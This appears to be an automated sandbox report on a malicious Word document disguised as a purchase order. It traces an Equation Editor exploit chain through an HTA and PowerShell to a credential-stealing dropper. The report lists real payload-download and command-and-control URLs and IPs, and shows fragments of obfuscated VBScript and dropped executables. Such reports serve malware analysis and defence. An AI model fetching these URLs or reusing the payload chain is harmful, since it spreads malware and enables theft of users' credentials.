                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1559210 Sample: PO-000041492.docx.doc Startdate: 20/11/2024 Architecture: WINDOWS Score: 100 70 provit.uk 2->70 88 Suricata IDS alerts for network traffic 2->88 90 Found malware configuration 2->90 92 Malicious sample detected (through community Yara rule) 2->92 94 22 other signatures 2->94 11 WINWORD.EXE 323 56 2->11         started        16 EXCEL.EXE 2->16         started        18 EXCEL.EXE 2->18         started        signatures3 process4 dnsIp5 74 66.63.187.231, 49167, 49169, 49170 ASN-QUADRANET-GLOBALUS United States 11->74 76 provit.uk 198.244.140.41, 443, 49161, 49162 RIDLEYSD-NETUS United States 11->76 58 C:\Users\user\...\we on 66.63.187.231.url, MS 11->58 dropped 60 C:\Users\user\AppData\Local\...\18F2865F.doc, Rich 11->60 dropped 62 seemybestoptionfor...nebestthigns[1].doc, Rich 11->62 dropped 112 Microsoft Office launches external ms-search protocol handler (WebDAV) 11->112 114 Office viewer loads remote template 11->114 116 Microsoft Office drops suspicious files 11->116 20 EQNEDT32.EXE 12 11->20         started        24 verclsid.exe 11->24         started        file6 signatures7 process8 file9 50 goodtoseeuthatgrea...irethingsgreatf.hta, HTML 20->50 dropped 52 goodtoseeuthatgrea...ingsgreatfor[1].hta, HTML 20->52 dropped 96 Office equation editor establishes network connection 20->96 98 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 20->98 26 mshta.exe 10 20->26         started        signatures10 process11 signatures12 100 Suspicious powershell command line found 26->100 102 PowerShell case anomaly found 26->102 29 powershell.exe 23 26->29         started        process13 file14 64 C:\Users\user\AppData\Roaming\wininit.exe, PE32 29->64 dropped 66 C:\Users\user\AppData\Local\...\caspol[1].exe, PE32 29->66 dropped 68 C:\Users\user\AppData\...\b2mggwzy.cmdline, Unicode 29->68 dropped 118 Drops PE files with benign system names 29->118 120 Powershell drops PE file 29->120 33 wininit.exe 3 29->33         started        36 powershell.exe 4 29->36         started        38 csc.exe 2 29->38         started        signatures15 process16 file17 78 Antivirus detection for dropped file 33->78 80 Tries to steal Mail credentials (via file registry) 33->80 82 Machine Learning detection for dropped file 33->82 86 2 other signatures 33->86 41 wininit.exe 33->41         started        46 powershell.exe 33->46         started        84 Installs new ROOT certificates 36->84 54 C:\Users\user\AppData\Local\...\b2mggwzy.dll, PE32 38->54 dropped 48 cvtres.exe 38->48         started        signatures18 process19 dnsIp20 72 94.156.177.41, 49171, 49172, 49173 NET1-ASBG Bulgaria 41->72 56 C:\Users\user\AppData\...\5879F5.exe (copy), PE32 41->56 dropped 104 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 41->104 106 Tries to steal Mail credentials (via file / registry access) 41->106 108 Tries to harvest and steal ftp login credentials 41->108 110 Tries to harvest and steal browser information (history, passwords, etc) 41->110 file21 signatures22

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                PO-000041492.docx.doc8%ReversingLabs
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\wininit.exe100%AviraHEUR/AGEN.1306899
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\caspol[1].exe100%AviraHEUR/AGEN.1306899
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\18F2865F.doc100%AviraHEUR/Rtf.Malformed
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seemybestoptionforentiretimegivenmebackwith______suchagreatthignswithentiretimewithmegood______seethebestthignsalwaysgivnebestthigns[1].doc100%AviraHEUR/Rtf.Malformed
                C:\Users\user\AppData\Roaming\wininit.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\caspol[1].exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://66.63.187.231/33/caspol.exeY0%Avira URL Cloudsafe
                http://94.156.177.41/maxzi/five/fre.php100%Avira URL Cloudmalware
                http://66.63.187.231/xampp/wer/goodtoseeuthatgreatthingswithentirethingsgreatfor.hta0%Avira URL Cloudsafe
                http://66.63.187.231/xampp/wer/we/seemybestoptionforentiretimegivenmebackwith______suchagreatthignswithentiretimewithmegood______seethebestthignsalwaysgivnebestthigns.doc0%Avira URL Cloudsafe
                http://66.63.187.231/xampp/wer/goodtoseeuthatgreatthingswithentirethingsgreatfor.htaMd0%Avira URL Cloudsafe
                http://66.63.187.231/xampp/wer/goodtoseeuthatgreatthingswithentirethingsgreatfor.htafd0%Avira URL Cloudsafe
                http://66.63.187.231/33/caspol.exe0%Avira URL Cloudsafe
                http://66.63.187.231/xampp/wer/we/0%Avira URL Cloudsafe
                http://66.63.187.231/33/caspol.eln0%Avira URL Cloudsafe
                http://66.63.187.231/xampp/wer/goodtoseeuthatgreatthingswithentirethingsgreatfor.htaj0%Avira URL Cloudsafe
                https://provit.uk/Ib9yLe?&shoelace=strong&skyscraper=discreet&roll=thoughtful&mimosa=wacky&vulture0%Avira URL Cloudsafe
                94.156.177.41/maxzi/five/fre.php100%Avira URL Cloudmalware
                NameIPActiveMaliciousAntivirus DetectionReputation
                provit.uk
                198.244.140.41
                truefalse
                  high
                  NameMaliciousAntivirus DetectionReputation
                  http://66.63.187.231/xampp/wer/goodtoseeuthatgreatthingswithentirethingsgreatfor.htatrue
                  • Avira URL Cloud: safe
                  unknown
                  http://66.63.187.231/xampp/wer/we/seemybestoptionforentiretimegivenmebackwith______suchagreatthignswithentiretimewithmegood______seethebestthignsalwaysgivnebestthigns.doctrue
                  • Avira URL Cloud: safe
                  unknown
                  http://66.63.187.231/33/caspol.exetrue
                  • Avira URL Cloud: safe
                  unknown
                  http://kbfvzoboss.bid/alien/fre.phpfalse
                    high
                    http://94.156.177.41/maxzi/five/fre.phptrue
                    • Avira URL Cloud: malware
                    unknown
                    http://alphastand.top/alien/fre.phpfalse
                      high
                      http://alphastand.win/alien/fre.phpfalse
                        high
                        94.156.177.41/maxzi/five/fre.phptrue
                        • Avira URL Cloud: malware
                        unknown
                        http://alphastand.trade/alien/fre.phpfalse
                          high
                          https://provit.uk/Ib9yLe?&shoelace=strong&skyscraper=discreet&roll=thoughtful&mimosa=wacky&vulturefalse
                          • Avira URL Cloud: safe
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          http://nuget.org/NuGet.exepowershell.exe, 0000000A.00000002.420446486.0000000002FB9000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://66.63.187.231/xampp/wer/goodtoseeuthatgreatthingswithentirethingsgreatfor.htajEQNEDT32.EXE, 00000008.00000002.390278380.00000000035F0000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.ibsensoftware.com/wininit.exe, wininit.exe, 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                              high
                              http://66.63.187.231/xampp/wer/goodtoseeuthatgreatthingswithentirethingsgreatfor.htaMdEQNEDT32.EXE, 00000008.00000002.390071517.000000000032F000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://contoso.com/powershell.exe, 0000000A.00000002.420446486.0000000002FB9000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://nuget.org/nuget.exepowershell.exe, 0000000A.00000002.420446486.0000000002FB9000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://66.63.187.231/xampp/wer/we/we on 66.63.187.231.url.0.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://contoso.com/Licensepowershell.exe, 0000000A.00000002.420446486.0000000002FB9000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://contoso.com/Iconpowershell.exe, 0000000A.00000002.420446486.0000000002FB9000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://66.63.187.231/33/caspol.exeYpowershell.exe, 0000000A.00000002.423235653.0000000004EF0000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://66.63.187.231/33/caspol.elnpowershell.exe, 0000000A.00000002.415492102.00000000020CA000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://66.63.187.231/xampp/wer/goodtoseeuthatgreatthingswithentirethingsgreatfor.htafdEQNEDT32.EXE, 00000008.00000002.390071517.000000000032F000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000A.00000002.415492102.0000000001F91000.00000004.00000800.00020000.00000000.sdmp, wininit.exe, 00000010.00000002.422492450.00000000020E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://go.microspowershell.exe, 0000000A.00000002.415492102.00000000020CA000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs
                                          IPDomainCountryFlagASNASN NameMalicious
                                          198.244.140.41
                                          provit.ukUnited States
                                          18630RIDLEYSD-NETUSfalse
                                          66.63.187.231
                                          unknownUnited States
                                          8100ASN-QUADRANET-GLOBALUStrue
                                          94.156.177.41
                                          unknownBulgaria
                                          43561NET1-ASBGtrue
                                          Joe Sandbox version:41.0.0 Charoite
                                          Analysis ID:1559210
                                          Start date and time:2024-11-20 10:10:07 +01:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 7m 1s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:defaultwindowsofficecookbook.jbs
                                          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                          Number of analysed new started processes analysed:23
                                          Number of new started drivers analysed:1
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:PO-000041492.docx.doc
                                          Detection:MAL
                                          Classification:mal100.troj.spyw.expl.evad.winDOC@22/41@7/3
                                          EGA Information:
                                          • Successful, ratio: 100%
                                          HCA Information:
                                          • Successful, ratio: 100%
                                          • Number of executed functions: 87
                                          • Number of non-executed functions: 15
                                          Cookbook Comments:
                                          • Found application associated with file extension: .doc
                                          • Found Word or Excel or PowerPoint or XPS Viewer
                                          • Attach to Office via COM
                                          • Active ActiveX Object
                                          • Scroll down
                                          • Close Viewer
                                          • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                          • VT rate limit hit for: PO-000041492.docx.doc
                                          TimeTypeDescription
                                          04:11:14API Interceptor43x Sleep call for process: EQNEDT32.EXE modified
                                          04:11:16API Interceptor24x Sleep call for process: mshta.exe modified
                                          04:11:17API Interceptor105x Sleep call for process: powershell.exe modified
                                          04:11:27API Interceptor8771x Sleep call for process: wininit.exe modified
                                          04:11:36API Interceptor8x Sleep call for process: verclsid.exe modified
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          198.244.140.41Credit_DetailsCBS24312017918.xla.xlsxGet hashmaliciousHTMLPhisherBrowse
                                            Payment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                              Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsxGet hashmaliciousAgentTesla, HTMLPhisherBrowse
                                                66.63.187.231seemefasterthanbeforewithhisbestthingsinonlineforgetreadyfor.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LokibotBrowse
                                                • 66.63.187.231/657/caspol.exe
                                                PO-000041492.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                • 66.63.187.231/xampp/noc/seemefasterthanbeforewithhisbestthingsinonlineforgetreadyfor.hta
                                                94.156.177.41ECxDwGGFH3.exeGet hashmaliciousLokibotBrowse
                                                • 94.156.177.41/simple/five/fre.php
                                                greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LokibotBrowse
                                                • 94.156.177.41/simple/five/fre.php
                                                Payment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                • 94.156.177.41/simple/five/fre.php
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                provit.ukCredit_DetailsCBS24312017918.xla.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                • 198.244.140.41
                                                Payment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                • 198.244.140.41
                                                Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsxGet hashmaliciousAgentTesla, HTMLPhisherBrowse
                                                • 198.244.140.41
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                ASN-QUADRANET-GLOBALUS________.exeGet hashmaliciousQuasarBrowse
                                                • 69.174.98.113
                                                seemefasterthanbeforewithhisbestthingsinonlineforgetreadyfor.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LokibotBrowse
                                                • 66.63.187.231
                                                PO-000041492.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                • 66.63.187.231
                                                RFQ541634_A_URGENT_QUOTATION_SHENLE.exeGet hashmaliciousGuLoaderBrowse
                                                • 64.188.27.210
                                                Order88983273293729387293828PDF.exeGet hashmaliciousQuasarBrowse
                                                • 72.11.156.80
                                                .main.elfGet hashmaliciousXmrigBrowse
                                                • 66.63.187.200
                                                mips.elfGet hashmaliciousMiraiBrowse
                                                • 104.223.82.201
                                                Trykblgens.exeGet hashmaliciousGuLoaderBrowse
                                                • 172.93.187.72
                                                QUOTATION #46789RFQ_SUPLM_NOV24_SALEH_CONSTRUCTIONS_LLC_PDF.exeGet hashmaliciousRemcos, DarkTortillaBrowse
                                                • 66.63.163.134
                                                COTIZACIONSyCONSULTA#46789NOV24.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                • 204.44.127.85
                                                NET1-ASBGECxDwGGFH3.exeGet hashmaliciousLokibotBrowse
                                                • 94.156.177.41
                                                greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LokibotBrowse
                                                • 94.156.177.41
                                                Payment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                • 94.156.177.41
                                                WjcXwIcclB.exeGet hashmaliciousLokibotBrowse
                                                • 94.156.177.41
                                                0aA7F59xDl.exeGet hashmaliciousLokibotBrowse
                                                • 94.156.177.95
                                                givemebestwithentiretimegivenmebestthingsalwaysforgetbacknew.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LokibotBrowse
                                                • 94.156.177.95
                                                seemybestbeautifulgirlwhowantbestthignsenitrelifetimethingstobe.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LokibotBrowse
                                                • 94.156.177.95
                                                seemefasterthanbeforewithhisbestthingsinonlineforgetreadyfor.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LokibotBrowse
                                                • 94.156.177.95
                                                PO-000041492.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                • 94.156.177.95
                                                Payment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                • 94.156.177.95
                                                RIDLEYSD-NETUSCredit_DetailsCBS24312017918.xla.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                • 198.244.140.41
                                                Payment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                • 198.244.140.41
                                                Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsxGet hashmaliciousAgentTesla, HTMLPhisherBrowse
                                                • 198.244.140.41
                                                nabspc.elfGet hashmaliciousUnknownBrowse
                                                • 198.244.7.173
                                                https://instagrambeta.github.io/Get hashmaliciousHTMLPhisherBrowse
                                                • 198.244.231.90
                                                SecuriteInfo.com.Trojan.WinGo.Agent.27329.6060.exeGet hashmaliciousUnknownBrowse
                                                • 198.244.179.42
                                                Informations.batGet hashmaliciousPureLog Stealer, XWormBrowse
                                                • 198.244.206.37
                                                Beopajki.exeGet hashmaliciousHVNC, PureLog Stealer, XWormBrowse
                                                • 198.244.206.37
                                                Your_New_Social_Security_Statement.wsfGet hashmaliciousXWormBrowse
                                                • 198.244.251.236
                                                http://www.loroc.co.uk/Get hashmaliciousUnknownBrowse
                                                • 198.244.213.27
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                05af1f5ca1b87cc9cc9b25185115607dEnv#U00edo de Orden de Compra No. 43456435344657.xla.xlsxGet hashmaliciousAgentTesla, HTMLPhisherBrowse
                                                • 198.244.140.41
                                                Xkl0PnD8zFPjfh1.wiz.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 198.244.140.41
                                                #U3010TW-S PO#U3011PO#3311-20241118003.xlsGet hashmaliciousHTMLPhisher, SmokeLoaderBrowse
                                                • 198.244.140.41
                                                Order_Summary.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                • 198.244.140.41
                                                INV-#000497053.docGet hashmaliciousUnknownBrowse
                                                • 198.244.140.41
                                                Purchase order (1).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                • 198.244.140.41
                                                Purchase order (2).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                • 198.244.140.41
                                                Document.xla.xlsxGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                • 198.244.140.41
                                                http://xoilacxd.ccGet hashmaliciousUnknownBrowse
                                                • 198.244.140.41
                                                Order_Confirmation.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                • 198.244.140.41
                                                7dcce5b76c8b17472d024758970a406bCredit_DetailsCBS24312017918.xla.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                • 198.244.140.41
                                                PO-000041492.xlsGet hashmaliciousUnknownBrowse
                                                • 198.244.140.41
                                                Credit_DetailsCBS24312017915.xla.xlsxGet hashmaliciousUnknownBrowse
                                                • 198.244.140.41
                                                PO-000041492.xlsGet hashmaliciousUnknownBrowse
                                                • 198.244.140.41
                                                Payment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                • 198.244.140.41
                                                Credit_DetailsCBS24312017915.xla.xlsxGet hashmaliciousUnknownBrowse
                                                • 198.244.140.41
                                                Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsxGet hashmaliciousAgentTesla, HTMLPhisherBrowse
                                                • 198.244.140.41
                                                PO-73375.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                • 198.244.140.41
                                                PO-000041492.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                • 198.244.140.41
                                                #U3010TW-S PO#U3011PO#3311-20241118003.xlsGet hashmaliciousHTMLPhisher, SmokeLoaderBrowse
                                                • 198.244.140.41
                                                No context
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):131072
                                                Entropy (8bit):0.025668551963191094
                                                Encrypted:false
                                                SSDEEP:6:I3DPcDEHvxggLRDQuXSHlRiZTtRXv//4tfnRujlw//+GtluJ/eRuj:I3DPbX7ylWTvYg3J/
                                                MD5:16856C02C25CD6C0F7CBDF82EE6A881E
                                                SHA1:1E1276ACAB8DB258721221765E8A04131F637A04
                                                SHA-256:571C51C64FF3D3C3FCFE0B3D1D9CFB614EBAFF3B3855BAF450732CF440402B6E
                                                SHA-512:9D6039785AD07E382BD8AE857C02C0D0633BE37E33C12D35DCB05F212A206C92DF02A2E93BA7A84B418EE6E40AA4D3BDB38C5FB4EC2BE66AF62CB77047A9098C
                                                Malicious:false
                                                Preview:......M.eFy...z..n..&B.!..8...S,...X.F...Fa.q............................;..(.5K...%q\2K............{..L...C..j.....................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):4760
                                                Entropy (8bit):4.834060479684549
                                                Encrypted:false
                                                SSDEEP:96:RCJ2Woe5u2k6Lm5emmXIGxgyg12jDs+un/iQLEYFjDaeWJ6KGcmXSFRLcU6/KD:cxoe5uVsm5emdOgkjDt4iWN3yBGHydcY
                                                MD5:838C1F472806CF4BA2A9EC49C27C2847
                                                SHA1:D1C63579585C4740956B099697C74AD3E7C89751
                                                SHA-256:40A844E6AF823D9E71A35DFEE1FF7383D8A682E9981FB70440CA47AA1F6F1FF3
                                                SHA-512:E784B61696AB19C5A178204A11E4012A9A29D58B3D3BF1D5648021693883FFF343C87777E7A2ADC81B833148B90B88E60948B370D2BB99DEC70C097B5C91B145
                                                Malicious:false
                                                Preview:PSMODULECACHE............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script...............T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):64
                                                Entropy (8bit):0.34726597513537405
                                                Encrypted:false
                                                SSDEEP:3:Nlll:Nll
                                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                Malicious:false
                                                Preview:@...e...........................................................
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):600576
                                                Entropy (8bit):7.913749036393697
                                                Encrypted:false
                                                SSDEEP:12288:VrOj+Ri3AgFdZeDZskwkzA0+7xUNq4KC73vUECPnsSnR83PdB0:xQ3AgSskwZNeEqdCPssS3F
                                                MD5:66B03D1AFF27D81E62B53FC108806211
                                                SHA1:2557EC8B32D0B42CAC9CABDE199D31C5D4E40041
                                                SHA-256:59586E753C54629F428A6B880F6AFF09F67AF0ACE76823AF3627DDA2281532E4
                                                SHA-512:9F8EF3DD8C482DEBB535B1E7C9155E4AB33A04F8C4F31ADE9E70ADBD5598362033785438D5D60C536A801E134E09FCD1BC80FC7AED2D167AF7F531A81F12E43D
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....:=g..............0...... .......&... ...@....@.. ....................................`..................................&..O....@..|....................`....................................................... ............... ..H............text........ ...................... ..`.rsrc...|....@......................@..@.reloc.......`.......(..............@..B.................&......H........6...(...........^................................................(......}.....{....r...p .....o5....{....o7...&*....0...........{......o9.....}........&.....*..................0..t........o.....{.....{....r...p(....o:.......+%.....{.....o....o;.....o......&....X....i2..{.....o<.......&.{....o=........*......+..E..........\b......2.{....oA...*n.(......}......}.....(....*....0...........{....o......3...%..;.o......{....o.....s......{.......o....,ir5..p..o......+...(...
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:Rich Text Format data, version 1
                                                Category:dropped
                                                Size (bytes):257200
                                                Entropy (8bit):2.34699194550343
                                                Encrypted:false
                                                SSDEEP:3072:sUcN1DaxXp1sAkC5gCQqCv7L5FokmFJcmrmR3D:slruZ1sA55gCQBL5FokmFyCmR3D
                                                MD5:E6859034A42F217800B6BF0980E93848
                                                SHA1:8DCB69DCF727B7A7FBFBF6755492990DC51FD192
                                                SHA-256:564A4E9044BD96C3C67AE4C596664A2D9A7ECD1962872AC836E051949FB109B1
                                                SHA-512:778CEEFC76571268A7C82C18EC1B6F6661B4F696D2612528B8EB94488383C84C9DBA6613CD5B1C715514E64D062D73D28D84395F30DADB4FD2DA51CBAC372D35
                                                Malicious:true
                                                Yara Hits:
                                                • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seemybestoptionforentiretimegivenmebackwith______suchagreatthignswithentiretimewithmegood______seethebestthignsalwaysgivnebestthigns[1].doc, Author: ditekSHen
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                Preview:{\rtf1..........{\*\pnaiu472632820 \"}.{\6420395929598_&=)@?=7(@06?3%%'(??-'>`1<.$0'8|`_[.?0]%_.:@&^8..1.|..43?>_96?=?!.%=#?%~/;!+(,#^%`$!!?0?!]%<0-00>)!.43|?6$.?:$#[$.>9:^^&$.*</5~-(,]:^*3<;;7!+5/^.?;$-<(.3.=71[??.86+06;$'845*?<(?6@`!_7?,@;-@&-3%_&-9&$%0_%!:?'?[`:?9&/?&?1`.3.?'7%?8=_`70)4?-6[0$5``.||%~+$2.6()/0=.10.9..?#86<?%7*_>:1??_/2~4)+.5(%^#149:.^=7+&'`.4?/11?_+0=%`+~:?.*'[?%^#?4=,,_`|?.?.$6#*%>&>;)+4?9?0?~&-`'??8)8%.<'=.#9#3-'5:*$%%[6*[:1##..@=&.3&=.5`5.??8/-8&[^?=?.|^/?&~(]/#<~.9[8?.?4]+%@@%.2-.64>.<.1>`(70?|8`$?1,~[^8?0)?=;,?#>:9=%;?%.=^0<$9)%&-4([&`?44*8|2[;+~<7#-*<67]651470..`[??=.)01+@12~#['3?=7??0+~?,&88[?%],23$'.[?,3%>@-&.??.%??[3+1...@@=!193)%?<(.[%.?%:)(/:9[$*??&-4[?!#2;8*:4=.2]-%^+'=.?+!$?2.6^%:|'`:_)/~|;]/]6'/-.@2?~2.?#:'%&-5%~5/[*.^84??(..|^:[@7=8]!'7<(|?|1^.`#|.-^80?3?3|#??||~.7$#8;?.#7=?%&?=[$92(_@?([)~$`99,#66)/2]_`*?@*.#.8]<@([?:;&7'$8>!*[3!?%1*;/08)=<`:$06.3?3|,0$>~:.[%,.?~&?)|%:'?5 4+9#(4-/]?)4_)3!*.7&$????;%?=50.]7_%'0&;?2_$$+~4[2*!^?#,$?]!-4)'$=>1<63'.-<^85
                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                File Type:HTML document, ASCII text, with very long lines (23388), with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):23556
                                                Entropy (8bit):1.6848932886813717
                                                Encrypted:false
                                                SSDEEP:96:C2vy2KJTuvPTTwduJZA6/3P42e2+ip2k+:TLwuv6QP5f+F3
                                                MD5:EC0D423A3F72D69975A1E31A275F5377
                                                SHA1:213922FB8456ECAADC24889AFEC1AC6EF5010C68
                                                SHA-256:9FD433CD543AB161D2A3CCB96A265C79EE0BB1A513647C0C33C72114660C64AC
                                                SHA-512:8132F567ABFD4E3489204D1F3A9FC8292457CE10495345CD0CCFA8074233411C8305C4D73078A7DEE02B086FBC22B8AD7047DD4BC127DE337D0800771EDF53AD
                                                Malicious:true
                                                Preview:<!DOCTYPE html>..<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >..<html>..<body>..<ScRipT LANGuagE="vBscRIpT">..DIm..............................................................................................................................................................................................................................................................................................................................................tzHLdKvsEcRWyQFPNHoyTeRtKqrFUgUlAoRyLWkDbyxAAzslucnYWlBayRmyLBfwwVLvflcYiZZEpfzNUcHCcwlZBMnkhugupWLqSGPRjiRWzLULwlRXTOODbDPFQNUvpSkWIiuwlAwrOtAtidmZdngahQoxtJqNCmFehSLdxChEPdkYlgmxnXjGbbfCAhnKlFqCZNLZaRvxkRURPVoeiRQJQNIGSlJCzyNdRVnAdTGK..............................................................................................................................................................................................................................................................................................................
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:Rich Text Format data, version 1
                                                Category:dropped
                                                Size (bytes):257200
                                                Entropy (8bit):2.34699194550343
                                                Encrypted:false
                                                SSDEEP:3072:sUcN1DaxXp1sAkC5gCQqCv7L5FokmFJcmrmR3D:slruZ1sA55gCQBL5FokmFyCmR3D
                                                MD5:E6859034A42F217800B6BF0980E93848
                                                SHA1:8DCB69DCF727B7A7FBFBF6755492990DC51FD192
                                                SHA-256:564A4E9044BD96C3C67AE4C596664A2D9A7ECD1962872AC836E051949FB109B1
